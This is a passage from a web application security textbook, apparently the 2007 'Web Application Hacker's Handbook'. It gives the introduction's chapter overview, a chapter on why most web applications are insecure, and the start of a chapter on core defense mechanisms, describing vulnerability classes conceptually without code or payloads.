strands introduced within the book. We describe the process of finding vul-

nerabilities in an application’s source code, review the tools that can assist you

when hacking web applications, and present a detailed methodology for per-

forming a comprehensive and deep attack against a specific target.

Chapter 1, “Web Application (In)security,” describes the current state of

security in web applications on the Internet today. Despite common assur-

ances, the majority of applications are insecure and can be compromised in

some way with a modest degree of skill. Vulnerabilities in web applications

arise because of a single core problem: users can submit arbitrary input. In this

chapter, we examine the key factors that contribute to the weak security pos-

ture of today’s applications, and describe how defects in web applications can

leave an organization’s wider technical infrastructure highly vulnerable to

attack.

Chapter 2, “Core Defense Mechanisms,” describes the key security mecha-

nisms that web applications employ to address the fundamental problem that

all user input is untrusted. These mechanisms are the means by which an

application manages user access, handles user input, and responds to attack-

ers, and the functions provided for administrators to manage and monitor the

application itself. The application’s core security mechanisms also represent

its primary attack surface, and you need to understand how these mechanisms

are intended to function before you can effectively attack them.

Chapter 3, “Web Application Technologies,” provides a short primer on the

key technologies that you are likely to encounter when attacking web applica-

tions. This covers all relevant aspects of the HTTP protocol, the technologies

commonly used on the client and server sides, and various schemes used for

encoding data. If you are already familiar with the main web technologies,

then you can quickly skim through this chapter.

Chapter 4, “Mapping the Application,” describes the first exercise that you

need to take when targeting a new application, which is to gather as much

information as possible about it, in order to map its attack surface and formu-

late your plan of attack. This process includes exploring and probing the appli-

cation to catalogue all of its content and functionality, identifying all of the

entry points for user input and discovering the technologies in use.

Chapter 5, “Bypassing Client-Side Controls,” describes the first area of

actual vulnerability, which arises when an application relies upon controls

implemented on the client side for its security. This approach is normally

flawed, because any client-side controls can, of course, be circumvented. The

two main ways in which applications make themselves vulnerable are (a) to

transmit data via the client in the assumption that this will not be modified,

Introduction xxvii

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxvii

and (b) to rely upon client-side checks on user input. In this chapter, we exam-

ine a range of interesting technologies, including lightweight controls imple-

mented within HTML, HTTP, and JavaScript, and more heavyweight controls

using Java applets, ActiveX controls, and Shockwave Flash objects.

Chapters 6 to 8 examine some of the most important defense mechanisms

implemented within web applications: those responsible for controlling user

access. Chapter 6, “Attacking Authentication,” examines the various functions

by which applications gain assurance of the identity of their users. This

includes the main login function and also the more peripheral authentication-

related functions such as user registration, password changing, and account

recovery. Authentication mechanisms contain a wealth of different vulnerabil-

ities, in both design and implementation, which an attacker can leverage to

gain unauthorized access. These range from obvious defects, such as bad pass-

words and susceptibility to brute-force attacks, to more obscure problems

within the authentication logic. We also examine in detail the type of multi-

stage login mechanisms used in many security-critical applications, and

describe the new kinds of vulnerability which these frequently contain.

Chapter 7, “Attacking Session Management,” examines the mechanism by

which most applications supplement the stateless HTTP protocol with the con-

cept of a stateful session, enabling them to uniquely identify each user across

several different requests. This mechanism is a key target when you are attack-

ing a web application, because if you can break it, then you can effectively

bypass the login and masquerade as other users without knowing their cre-

dentials. We look at various common defects in the generation and transmis-

sion of session tokens, and describe the steps you can take to discover and

exploit these.

Chapter 8, “Attacking Access Controls,” examines the ways in which appli-

cations actually enforce access controls, relying upon the authentication and

session management mechanisms to do so. We describe various ways in which

access controls can be broken and the ways in which you can detect and

exploit these weaknesses.

Chapter 9, “Injecting Code,” covers a large category of related vulnerabili-

ties, which arise when applications embed user input into interpreted code in

an unsafe way. We begin with a detailed examination of SQL injection vulner-

abilities, covering the full range of attacks from the most obvious and trivial to

advanced exploitation techniques involving out-of-band channels, inference,

and time delays. For each kind of vulnerability and attack technique, we

describe the relevant differences between three common types of databases:

MS-SQL, Oracle, and MySQL. We then cover several other categories of injec-

tion vulnerability, including the injection of operating system commands,

injection into web scripting languages, and injection into the SOAP, XPath,

SMTP, and LDAP protocols.

xxviii Introduction

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxviii

Chapter 10, “Exploiting Path Traversal,” examines a small but important

category of vulnerabilities that arise when user input is passed to file system

APIs in an unsafe way, enabling an attacker to retrieve or modify arbitrary

files on the web server. We describe various bypasses that may be effective

against the defenses commonly implemented to prevent path traversal

attacks.

Chapter 11, “Attacking Application Logic,” examines a significant, and fre-

quently overlooked, area of every application’s attack surface: the internal

logic which it carries out to implement its functionality. Defects in an applica-

tion’s logic are extremely varied and are harder to characterize than common

vulnerabilities like SQL injection and cross-site scripting. For this reason, we

present a series of real-world examples where defective logic has left an appli-

cation vulnerable, and thereby illustrate the variety of faulty assumptions

made by application designers and developers. From these different individ-

ual flaws, we w derive a series of specific tests that you can perform to locate

many types of logic flaws that often go undetected.

Chapter 12, “Attacking Other Users,” covers a large and very topical area of

related vulnerabilities which arise when defects within a web application can

enable a malicious user of the application to attack other users and compro-

mise them in various ways. The largest vulnerability of this kind is cross-site

scripting, a hugely prevalent flaw affecting the vast majority of web applica-

tions on the Internet. We examine in detail all of the different flavors of XSS

vulnerabilities, and describe an effective methodology for detecting and

exploiting even the most obscure manifestations of these. We then look at sev-

eral other types of attacks against other users, including redirection attacks,

HTTP header injection, frame injection, cross-site request forgery, session fixa-

tion, exploiting bugs in ActiveX controls, and local privacy attacks.

Chapter 13, “Automating Bespoke Attacks,” does not introduce any new

categories of vulnerability, but instead, describes a crucial technique which

you need to master to attack web applications effectively. Because every web

application is different, most attacks are bespoke (or custom-made) in some

way, tailored to the application’s specific behavior and the ways you have dis-

covered to manipulate it to your advantage. They also frequently require issu-

ing a large number of similar requests and monitoring the application’s

responses. Performing these requests manually is extremely laborious and one

is prone to make mistakes. To become a truly accomplished web application

hacker, you need to automate as much of this work as possible, to make your

bespoke attacks easier, faster, and more effective. In this chapter, we describe

in detail a proven methodology for achieving this.

Chapter 14, “Exploiting Information Disclosure,” examines various ways in

which applications leak information when under active attack. When you are

performing all of the other types of attacks described in this book, you should

always monitor the application to identify further sources of information

Introduction xxix

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxix

disclosure that you can exploit. We describe how you can investigate anom-

alous behavior and error messages to gain a deeper understanding of the

application’s internal workings and fine-tune your attack. We also cover ways

of manipulating defective error handling to systematically retrieve sensitive

information from the application.

Chapter 15, “Attacking Compiled Applications,” examines a set of impor-

tant vulnerabilities which arise in applications written in native code lan-

guages like C and C++. These vulnerabilities include buffer overflows, integer

vulnerabilities, and format string flaws. This is a potentially huge topic, and

we focus on ways of detecting these vulnerabilities in web applications, and

look at some real-world examples of how these have arisen and been

exploited.

Chapter 16, “Attacking Application Architecture,” examines an important

area of web application security that is frequently overlooked. Many applica-

tions employ a tiered architecture, and a failure to segregate different tiers

properly often leaves an application vulnerable, enabling an attacker who has

found a defect in one component to quickly compromise the entire applica-

tion. A different range of threats arises in shared hosting environments, where

defects or malicious code in one application can sometimes be exploited to

compromise the environment itself and other applications running within it.

Chapter 17, “Attacking the Web Server,” describes various ways in which

you can target a web application by targeting the web server on which it is

running. Vulnerabilities in web servers are broadly composed of defects in

their configuration and security flaws within the web server software. This

topic is on the boundary of the scope of this book, because the web server is

strictly a different component in the technology stack. However, most web

applications are intimately bound up with the web server on which they run;

therefore, attacks against the web server are included in the book because they

can often be used to compromise an application directly, rather than indirectly

by first compromising the underlying host.

Chapter 18, “Finding Vulnerabilities in Source Code,” describes a com-

pletely different approach to finding security flaws than those described else-

where within this book. There are many situations in which it may be possible

to perform a review of an application’s source code, not all of which require

any cooperation from the application’s owner. Reviewing an application’s

source code can often be highly effective in discovering vulnerabilities that

would be difficult or time-consuming to detect by probing the running appli-

cation. We describe a methodology, and provide a language-by-language cheat

sheet, to enable you to perform an effective code review even if you have very

limited programming experience yourself.

Chapter 19, “A Web Application Hacker’s Toolkit,” pulls together in one place

the various tools described in the course of this book, and which the authors use

when attacking real-world web applications. We describe the strengths and

xxx Introduction

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxx

weaknesses of different tools, explain the extent to which any fully automated

tool can be effective in finding web application vulnerabilities, and provide

some tips and advice for getting the most out of your toolkit.

Chapter 20, “A Web Application Hacker’s Methodology,” contains a com-

prehensive and structured collation of all the procedures and techniques

described in this book. These are organized and ordered according to the logi-

cal dependencies between tasks when you are carrying out an actual attack. If

you have read and understood all of the vulnerabilities and techniques

described in this book, you can use this methodology as a complete checklist

and work plan when carrying out an attack against a web application.

Tools You Will Need

This book is strongly geared towards the hands-on techniques that you can use

to attack web applications. After reading the book, you will understand the

specifics of each individual task, what it involves technically, and why it works

in helping you detect and exploit vulnerabilities. The book is emphatically not

about downloading some tool, pointing it at a target application, and believing

what the tool’s output tells you about the state of the application’s security.

That said, there are several tools which you will find useful, and sometimes

indispensable, when performing the tasks and techniques that we describe. All

of these are easily available on the Internet, and we recommended that you

download and experiment with each tool at the point where it appears in the

course of the book.

What's on the Web Site

The companion web site for this book at www.wiley.com/go/webhacker con-

tains several resources that you will find useful in the course of mastering the

techniques we describe and using them to attack actual applications. In partic-

ular, the web site contains the following:

■■

Source code to some of the scripts we present in the book.

■■

A list of current links to all of the tools and other resources discussed in

the book.

■■

A handy checklist of the tasks involved in attacking a typical application.

■■

Answers to the questions posed at the end of each chapter.

■■

A hacking challenge containing many of the vulnerabilities described in

the book.

Introduction xxxi

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxxi

Bring It On

Web application security is a fun and thriving subject. We enjoyed writing this

book as much as we continue to enjoy hacking into web applications on a daily

basis. We hope that you will also take pleasure from learning about the differ-

ent techniques we describe and how these can be defended against.

Before going any further, we should mention an important caveat. In most

countries, attacking computer systems without the owner’s permission is

against the law. The majority of the techniques we describe are illegal if carried

out without consent.

The authors are professional penetration testers who routinely attack web

applications on behalf of clients, to help them improve their security. In recent

years, numerous security professionals and others have acquired criminal

records, and ended their careers, by experimenting on or actively attacking

computer systems without permission. We urge you to use the information

contained in this book only for lawful purposes.

xxxii Introduction

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxxii

There is no doubt that web application security is a current and very news-

worthy subject. For all concerned, the stakes are high: for businesses that

derive increasing revenue from Internet commerce, for users who trust web

applications with sensitive information, and for criminals who can make big

money by stealing payment details or compromising bank accounts. Reputa-

tion plays a critical role: few people want to do business with an insecure web

site, and so few organizations want to disclose details about their own security

vulnerabilities or breaches. Hence, it is not trivial to obtain reliable informa-

tion about the state of web application security today.

This chapter takes a brief look at how web applications have evolved and the

many benefits they provide. We present some metrics about vulnerabilities in

current web applications, drawn from the authors’ direct experience, demon-

strating that the majority of applications are far from secure. We describe the

core security problem facing web applications — that users can supply arbi-

trary input — and the various factors that contribute to their weak security pos-

ture. Finally, we describe the latest trends in web application security and the

ways in which these may be expected to develop in the near future.

Web Application (In)security

CHAPTER

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 1

The Evolution of Web Applications

In the early days of the Internet, the World Wide Web consisted only of web sites.

These were essentially information repositories containing static documents,

and web browsers were invented as a means of retrieving and displaying those

documents, as shown in Figure 1-1. The flow of interesting information was one-

way, from server to browser. Most sites did not authenticate users, because there

was no need to — each user was treated in the same way and presented with the

same information. Any security threats arising from hosting a web site related

largely to vulnerabilities in web server software (of which there were many). If

an attacker compromised a web server, he would not normally gain access to

any sensitive information, because the information held on the server was

already open to public view. Rather, an attacker would typically modify the files

on the server to deface the web site’s contents, or use the server’s storage and

bandwidth to distribute “warez.”

Figure 1-1: A traditional web site containing static information

Today, the World Wide Web is almost unrecognizable from its earlier form.

The majority of sites on the web are in fact applications (see Figure 1-2). They

are highly functional, and rely upon two-way flow of information between the

server and browser. They support registration and login, financial transactions,

search, and the authoring of content by users. The content presented to users is

generated dynamically on the fly, and is often tailored to each specific user.

Much of the information processed is private and highly sensitive. Security is

2 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 2

therefore a big issue: no one wants to use a web application if they believe their

information will be disclosed to unauthorized parties.

Web applications bring with them new and significant security threats. Each

application is different and may contain unique vulnerabilities. Most applica-

tions are developed in-house, and many by developers who have little under-

standing of the security problems that may arise in the code they are

producing. To deliver their core functionality, web applications normally

require connectivity to internal computer systems that contain highly sensitive

data and are able to perform powerful business functions. Ten years ago, if you

wanted to make a funds transfer, you visited your bank and someone per-

formed it for you; today, you can visit their web application and perform it

yourself. An attacker who compromises a web application may be able to steal

personal information, carry out financial fraud, and perform malicious actions

against other users.

Figure 1-2 A typical web application

Common Web Application Functions

Web applications have been created to perform practically every useful func-

tion one could possibly implement online. Examples of web application func-

tions that have risen to prominence in recent years include:

■■

Shopping (Amazon)

■■

Social networking (MySpace)

Chapter 1 ■ Web Application (In)security 3

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 3

■■

Banking (Citibank)

■■

Web search (Google)

■■

Auctions (eBay)

■■

Gambling (Betfair)

■■

Web logs (Blogger)

■■

Web mail (Hotmail)

■■

Interactive information (Wikipedia)

In addition to the public Internet, web applications have been widely

adopted inside organizations to perform key business functions, including

accessing HR services and managing company resources. They are also fre-

quently used to provide an administrative interface to hardware devices such

as printers, and other software such as web servers and intrusion detection

systems.

Numerous applications that predated the rise of web applications have been

migrated to this technology. Business applications like enterprise resource

planning (ERP) software, which were previously accessed using a proprietary

thick-client application, can now be accessed using a web browser. Software

services such as email, which originally required a separate email client, can

now be accessed via web interfaces like Outlook Web Access. This trend is con-

tinuing as traditional desktop office applications such as word processors and

spreadsheets are migrated to web applications, through services like Google

Apps and Microsoft Office Live.

The time is fast approaching when the only client software that most com-

puter users will need is a web browser. A hugely diverse range of functions

will have been implemented using a shared set of protocols and technologies,

and in so doing will have inherited a distinctive range of common security

vulnerabilities.

Benefits of Web Applications

It is not difficult to see why web applications have enjoyed such a dramatic

rise to prominence. Several technical factors have worked alongside the obvi-

ous commercial incentives to drive the revolution that has occurred in the way

we use the Internet:

■■

HTTP, the core communications protocol used to access the World Wide

Web, is lightweight and connectionless. This provides resilience in the

event of communication errors and avoids the need for the server to

hold open a network connection to every user as was the case in many

4 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 4

legacy client-server applications. HTTP can also be proxied and tun-

neled over other protocols, allowing for secure communication in any

network configuration.

■■

Every web user already has a browser installed on their computer.

Web applications deploy their user interface dynamically to the

browser, avoiding the need to distribute and manage separate client

software, as was the case with pre-web applications. Changes to the

interface only need to be implemented once, on the server, and take

effect immediately.

■■

Today’s browsers are highly functional, enabling rich and satisfying

user interfaces to be built. Web interfaces use standard navigational and

input controls that are immediately familiar to users, avoiding the need

to learn how each individual application functions. Client-side scripting

enables applications to push part of their processing to the client side,

and browsers’ capabilities can be extended in arbitrary ways using

thick-client components where necessary.

■■

The core technologies and languages used to develop web applications

are relatively simple. A wide range of platforms and development tools

are available to facilitate the development of powerful applications by

relative beginners, and a large quantity of open source code and other

resources is available for incorporation into custom-built applications.

Web Application Security

As with any new class of technology, web applications have brought with

them a new range of security vulnerabilities. The set of most commonly

encountered defects has evolved somewhat over time. New attacks have been

conceived that were not considered when existing applications were devel-

oped. Some problems have become less prevalent as awareness of them has

increased. New technologies have been developed that have introduced new

possibilities for exploitation. Some categories of flaws have largely gone away

as the result of changes made to web browser software.

Throughout this evolution, compromises of prominent web applications

have remained in the news, and there is no sense that a corner has been turned

and that these security problems are on the wane. Arguably, web application

security is today the most significant battleground between attackers and

those with computer resources and data to defend, and it is likely to remain so

for the foreseeable future.

Chapter 1 ■ Web Application (In)security 5

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 5

“This Site Is Secure”

There is a widespread awareness that security is an “issue” for web applica-

tions. Consult the FAQ page of a typical application, and you will be reassured

that it is in fact secure. For example:

This site is absolutely secure. It has been designed to use 128-bit Secure Socket

Layer (SSL) technology to prevent unauthorized users from viewing any of your

information. You may use this site with peace of mind that your data is safe with us.

In virtually every case, web applications state that they are secure because

they use SSL. Users are often urged to verify the site’s certificate, admire the

advanced cryptographic protocols in use, and on this basis, trust it with their

personal information.

In fact, the majority of web applications are insecure, and in ways that have

nothing to do with SSL. The authors of this book have tested hundreds of web

applications in recent years. Figure 1-3 shows the proportions of those appli-

cations tested during 2006 and 2007 that were found to be affected by some

common categories of vulnerability. These are explained briefly below:

■■

Broken authentication (67%) — This category of vulnerability encom-

passes various defects within the application’s login mechanism, which

may enable an attacker to guess weak passwords, launch a brute-force

attack, or bypass the login altogether.

■■

Broken access controls (78%) — This involves cases where the appli-

cation fails to properly protect access to its data and functionality,

potentially enabling an attacker to view other users’ sensitive data held

on the server, or carry out privileged actions.

■■

SQL injection (36%) — This vulnerability enables an attacker to sub-

mit crafted input to interfere with the application’s interaction with

back-end databases. An attacker may be able to retrieve arbitrary data

from the application, interfere with its logic, or execute commands on

the database server itself.

■■

Cross-site scripting (91%) — This vulnerability enables an attacker to

target other users of the application, potentially gaining access to their

data, performing unauthorized actions on their behalf, or carrying out

other attacks against them.

■■

Information leakage (81%) — This involves cases where an applica-

tion divulges sensitive information that is of use to an attacker in devel-

oping an assault against the application, through defective error

handling or other behavior.

6 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 6

Figure 1-3 The incidence of some common web application vulnerabilities in

applications recently tested by the authors (based on a sample of more than 100)

SSL is an excellent technology that protects the confidentiality and integrity

of data in transit between the user’s browser and the web server. It helps to

defend against eavesdroppers, and it can provide assurance to the user of the

identity of the web server they are dealing with. But it does not stop attacks

that directly target the server or client components of an application, as most

successful attacks do. Specifically, it does not prevent any of the vulnerabilities

listed previously, or many others that can render an application critically

exposed to attack. Regardless of whether or not they use SSL, most web appli-

cations still contain security flaws.

NOTE Although SSL has nothing to do with the majority of web application

vulnerabilities, do not infer that it is unnecessary to an application’s security.

Properly used, SSL provides an effective defense against several important

attacks. An occasional mistake by developers is to eschew industry-standard

cryptography in favor of a home-grown solution, which as a rule is more

expensive and less effective. Consider the following (actual) FAQ answer, which

rings even louder alarm bells than the orthodox wisdom described previously:

This site is secure. For your safety (and our peace of mind) we do not use

“standard” security procedures such as SSL but proprietary protocols which we

won’t disclose in detail here but permit immediate transfer of any data you

submit to a completely secure location. In other words the data never stays on

a server “floating in cyberspace,” which allows us to keep potential

malfeasants in the dark.

0% 10% 20% 30% 40% 50% 60% 70% 80% 90%

Broken authentication

Broken access controls

SQL injection

Cross-site scripting

Information leakage

67%

78%

36%

91%

81%

Incidence in recently tested applications

100%

Chapter 1 ■ Web Application (In)security 7

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 7

The Core Security Problem:

Users Can Submit Arbitrary Input

As with most distributed applications, web applications face a fundamental

problem which they must address in order to be secure. Because the client is

outside of the application’s control, users can submit completely arbitrary

input to the server-side application. The application must assume that all input

is potentially malicious, and must take steps to ensure that attackers cannot use

crafted input to compromise the application by interfering with its logic and

behavior and gaining unauthorized access to its data and functionality.

This core problem manifests itself in various ways:

■■

Users can interfere with any piece of data transmitted between the

client and the server, including request parameters, cookies, and HTTP

headers. Any security controls implemented on the client side, such as

input validation checks, can be easily circumvented.

■■

Users can send requests in any sequence, and can submit parameters at

a different stage than the application expects, more than once, or not at

all. Any assumption which developers make about how users will

interact with the application may be violated.

■■

Users are not restricted to using only a web browser to access the appli-

cation. There are numerous widely available tools that operate along-

side, or independently of, a browser, to help attack web applications.

These tools can make requests that no browser would ordinarily make,

and can generate huge numbers of requests quickly to find and exploit

problems.

The majority of attacks against web applications involve sending input to

the server which is crafted to cause some event that was not expected or

desired by the application’s designer. Some examples of submitting crafted

input to achieve this objective are as follows:

■■

Changing the price of a product transmitted in a hidden HTML form

field, to fraudulently purchase the product for a cheaper amount.

■■

Modifying a session token transmitted in an HTTP cookie, to hijack the

session of another authenticated user.

■■

Removing certain parameters that are normally submitted, to exploit a

logic flaw in the application’s processing.

■■

Altering some input that will be processed by a back-end database, to

inject a malicious database query and so access sensitive data.

Needless to say, SSL does nothing to stop an attacker from submitting

crafted input to the server. If the application uses SSL, this simply means that

8 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 8

other users on the network cannot view or modify the attacker’s data in tran-

sit. Because the attacker controls her end of the SSL tunnel, she can send any-

thing she likes to the server through this tunnel. If any of the previously

mentioned attacks are successful, then the application is emphatically vulner-

able, regardless of what its FAQ may tell you.

Key Problem Factors

The core security problem faced by web applications arises in any situation

where an application must accept and process untrusted data that may be

malicious. However, in the case of web applications, there are several factors

which have combined to exacerbate the problem, and which explain why

so many web applications on the Internet today do such a poor job of address-

ing it.

Immature Security Awareness

There is a less mature level of awareness of web application security issues

than there is in longer-established areas such as networks and operating sys-

tems. While most people working in IT security have a reasonable grasp of the

essentials of securing networks and hardening hosts, there is still widespread

confusion and misconception about many of the core concepts involved in

web application security. It is common to meet experienced web application

developers to whom an explanation of many basic types of flaws comes as a

complete revelation.

In-House Development

Most web applications are developed in-house by an organization’s own staff

or contractors. Even where an application employs third-party components,

these are typically customized or bolted together using new code. In this situ-

ation, every application is different and may contain its own unique defects.

This stands in contrast to a typical infrastructure deployment in which an

organization can purchase a best-of-breed product and install it in line with

industry-standard guidelines.

Deceptive Simplicity

With today’s web application platforms and development tools, it is possible

for a novice programmer to create a powerful application from scratch in a

short period of time. But there is a huge difference between producing code

that is functional and code that is secure. Many web applications are created

Chapter 1 ■ Web Application (In)security 9

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 9

by well-meaning individuals who simply lack the knowledge and experience

to identify where security problems may arise.

Rapidly Evolving Threat Profile

As a result of its relative immaturity, research into web application attacks and

defenses is a thriving area in which new concepts and threats are conceived at

a faster rate than is now the case for older technologies. A development team

that begins a project with a complete knowledge of current threats may well

have lost this status by the time the application is completed and deployed.

Resource and Time Constraints

Most web application development projects are subject to strict constraints on

time and resources, arising from the economics of in-house, one-off develop-

ment. It is not usually possible to employ dedicated security expertise in the

design or development teams, and due to project slippage security testing by

specialists is often left until very late in the project’s lifecycle. In the balancing

of competing priorities, the need to produce a stable and functional applica-

tion by a deadline normally overrides less tangible security considerations. A

typical small organization may be willing to pay for only a few man-days of

consulting time to evaluate a new application. A quick penetration test will

often find the low-hanging fruit, but it may miss more subtle vulnerabilities

that require time and patience to identify.

Overextended Technologies

Many of the core technologies employed in web applications began life when

the landscape of the World Wide Web was very different, and have since been

pushed far beyond the purposes for which they were originally conceived —

for example, the use of JavaScript as a means of data transmission in many

AJAX-based applications. As the expectations placed on web application func-

tionality have rapidly evolved, the technologies used to implement this func-

tionality have lagged behind the curve, with old technologies stretched and

adapted to meet new requirements. Unsurprisingly, this has led to security

vulnerabilities as unforeseen side effects emerge.

The New Security Perimeter

Before the rise of web applications, organizations’ efforts to secure themselves

against external attack were largely focused on the network perimeter. Defend-

ing this perimeter entailed hardening and patching the services that it needed

to expose, and firewalling access to others.

10 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 10

Web applications have changed all of this. For an application to be accessi-

ble by its users, the perimeter firewall must allow inbound connections to the

server over HTTP/S. And for the application to function, the server must be

allowed to connect to supporting back-end systems, such as databases, main-

frames, and financial and logistical systems. These systems often lie at the core

of the organization’s operations and reside behind several layers of network-

level defenses.

If a vulnerability exists within a web application, then an attacker on the

public Internet may be able to compromise the organization’s core back-end

systems solely by submitting crafted data from his web browser. This data will

sail past all of the organization’s network defenses, in just the same way as

does ordinary, benign traffic to the web application.

The effect of widespread deployment of web applications is that the security

perimeter of a typical organization has moved. Part of that perimeter is still

embodied in firewalls and bastion hosts. But a significant part of it is now

occupied by the organization’s web applications. Because of the manifold

ways in which web applications receive user input and pass this to sensitive

back-end systems, they are the potential gateways for a wide range of attacks,

and defenses against these attacks must be implemented within the applica-

tions themselves. A single line of defective code in a single web application can

render an organization’s internal systems vulnerable. The statistics described

previously, of the incidence of vulnerabilities within this new security perime-

ter, should give every organization pause for thought.

NOTE For an attacker targeting an organization, gaining access to the

network or executing arbitrary commands on servers may well not be what

they really want to achieve. Often, and perhaps typically, what an attacker

really desires is to perform some application-level action such as stealing

personal information, transferring funds, or making cheap purchases. And the

relocation of the security perimeter to the application layer may greatly assist

an attacker in achieving these objectives.

For example, suppose that an attacker wishes to “hack in” to a bank’s systems

and steal money from users’ accounts. Before the bank deployed a web

application, the attacker might have needed to find a vulnerability in a publicly

reachable service, exploit this to gain a toehold on the bank’s DMZ, penetrate

the firewall restricting access to its internal systems, map the network to find

the mainframe computer, decipher the arcane protocol used to access it, and

then guess some credentials in order to log in. However, if the bank deploys a

vulnerable web application, then the attacker may be able to achieve the same

outcome simply by modifying an account number in a hidden field of an HTML

form.

Chapter 1 ■ Web Application (In)security 11

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 11

A second way in which web applications have moved the security perime-

ter arises from the threats that users themselves face when they access a vul-

nerable application. A malicious attacker can leverage a benign but vulnerable

web application to attack any user who visits it. If that user is located on an

internal corporate network, the attacker may harness the user’s browser to

launch an attack against the local network from the user’s trusted position.

Without any cooperation from the user, the attacker may be able to carry out

any action that the user could perform if she were herself malicious.

Network administrators are familiar with the idea of preventing their users

from visiting malicious web sites, and end users themselves are gradually

becoming more aware of this threat. But the nature of web application vulner-

abilities means that a vulnerable application may present no less of a threat to

its users and their organization than a web site that is overtly malicious. Cor-

respondingly, the new security perimeter imposes a duty of care on all appli-

cation owners to protect their users from attacks against them delivered via

the application.

The Future of Web Application Security

Several years after their widespread adoption, web applications on the Internet

today are still rife with vulnerabilities. Understanding of the security threats

facing web applications, and effective ways of addressing these, remains imma-

ture within the industry. There is currently little indication that the problem fac-

tors described previously are going to go away in the near future.

That said, the details of the web application security landscape are not sta-

tic. While old and well understood vulnerabilities like SQL injection continue

to appear, their prevalence is gradually diminishing. Further, the instances

that remain are becoming more difficult to find and exploit. Much current

research is focused on developing advanced techniques for attacking more

subtle manifestations of vulnerabilities which a few years ago could be easily

detected and exploited using only a browser.

A second prominent trend is a gradual shift in attention from traditional

attacks against the server side of the application to those that target other

users. The latter kind of attack still leverages defects within the application

itself, but it generally involves some kind of interaction with another user, to

compromise that user’s dealings with the vulnerable application. This is a

trend that has been replicated in other areas of software security. As awareness

of security threats matures, flaws in the server side are the first to be well

understood and addressed, leaving the client side as a key battleground as the

learning process continues. Of all the attacks described in this book, those

against other users are evolving the most quickly, and are the focus of most

current research.

12 Chapter 1 ■ Web Application (In)security

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 12

Chapter Summary

In a few short years, the World Wide Web has evolved from purely static infor-

mation repositories into highly functional applications that process sensitive

data and perform powerful actions with real-world consequences. During this

development, several factors have combined to bring about the weak security

posture demonstrated by the majority of today’s web applications.

Most applications face the core security problem that users can submit arbi-

trary input. Every aspect of the user’s interaction with the application may be

malicious and should be regarded as such unless proven otherwise. Failure to

properly address this problem can leave applications vulnerable to attack in

numerous ways.

All of the evidence about the current state of web application security indi-

cates that this problem has not been resolved on any significant scale, and that

attacks against web applications present a serious threat both to the organiza-

tions that deploy them and to the users who access them.

Chapter 1 ■ Web Application (In)security 13

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 13

70779c01.qxd:WileyRed 9/14/07 3:12 PM Page 14

The fundamental security problem with web applications — that all user

input is untrusted — gives rise to a number of security mechanisms that appli-

cations use to defend themselves against attack. Virtually all applications

employ mechanisms that are conceptually similar, although the details of the

design and the effectiveness of the implementation differ very widely indeed.

The defense mechanisms employed by web applications comprise the fol-

lowing core elements:

■■

Handling user access to the application’s data and functionality, to pre-

vent users from gaining unauthorized access.

■■

Handling user input to the application’s functions, to prevent mal-

formed input from causing undesirable behavior.

■■

Handling attackers, to ensure that the application behaves appropri-

ately when being directly targeted, taking suitable defensive and offen-

sive measures to frustrate the attacker.

■■

Managing the application itself, by enabling administrators to monitor

its activities and configure its functionality.

Because of their central role in addressing the core security problem, these

mechanisms also make up the vast majority of a typical application’s attack

surface. If knowing your enemy is the first rule of warfare, then understanding

these mechanisms thoroughly is the main prerequisite to being able to attack

Core Defense Mechanisms

CHAPTER

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 15

applications effectively. If you are new to hacking web applications, and even

if you are not, you should be sure to take time to understand how these core

mechanisms work in each of the applications you encounter, and identify the

weak points that leave them vulnerable to attack.

Handling User Access

A central security requirement that virtually any application needs to meet is

to control users’ access to its data and functionality. In a typical situation, there

are several different categories of user; for example, anonymous users, ordi-

nary authenticated users, and administrative users. Further, in many situa-

tions different users are permitted to access a different set of data; for example,

users of a web mail application should be able to read their own email but not

other people’s.

Most web applications handle access using a trio of interrelated security

mechanisms:

■■

Authentication

■■

Session management

■■

Access control

Each of these mechanisms represents a significant area of an application’s

attack surface, and each is absolutely fundamental to an application’s overall

security posture. Because of their interdependencies, the overall security pro-

vided by the mechanisms is only as strong as the weakest link in the chain. A

defect in any single component may enable an attacker to gain unrestricted

access to the application’s functionality and data.

Authentication

The authentication mechanism is logically the most basic dependency in an

application’s handling of user access. Authenticating a user involves estab-

lishing that the user is in fact who he claims to be. Without this facility, the

application would need to treat all users as anonymous — the lowest possible

level of trust.

The majority of today’s web applications employ the conventional authenti-

cation model in which the user submits a username and password, which the

application checks for validity. Figure 2-1 shows a typical login function. In secu-

rity-critical applications such as those used by online banks, this basic model is

usually supplemented by additional credentials and a multistage login process.

When security requirements are higher still, other authentication models may be

used, based on client certificates, smartcards, or challenge-response tokens. In

16 Chapter 2 ■ Core Defense Mechanisms

70779c02.qxd:WileyRed 9/14/07 3:12 PM Page 16

addition to the core login process, authentication mechanisms often employ a

range of other supporting functionality, such as self-registration, account recov-

ery, and a password change facility.

Figure 2-1: A typical login function

Despite their superficial simplicity, authentication mechanisms suffer from

a wide range of defects, in both design and implementation. Common prob-

lems may enable an attacker to identify other users’ usernames, guess their

passwords, or bypass the login function altogether by exploiting defects in its

logic. When you are attacking a web application, you should invest a signifi-

cant amount of attention in the various authentication-related functions that it

contains. Surprisingly frequently, defects in this functionality will enable you

to gain unauthorized access to sensitive data and functionality.

Session Management

The next logical task in the process of handling user access is to manage the

authenticated user’s session. After successfully logging in to the application,

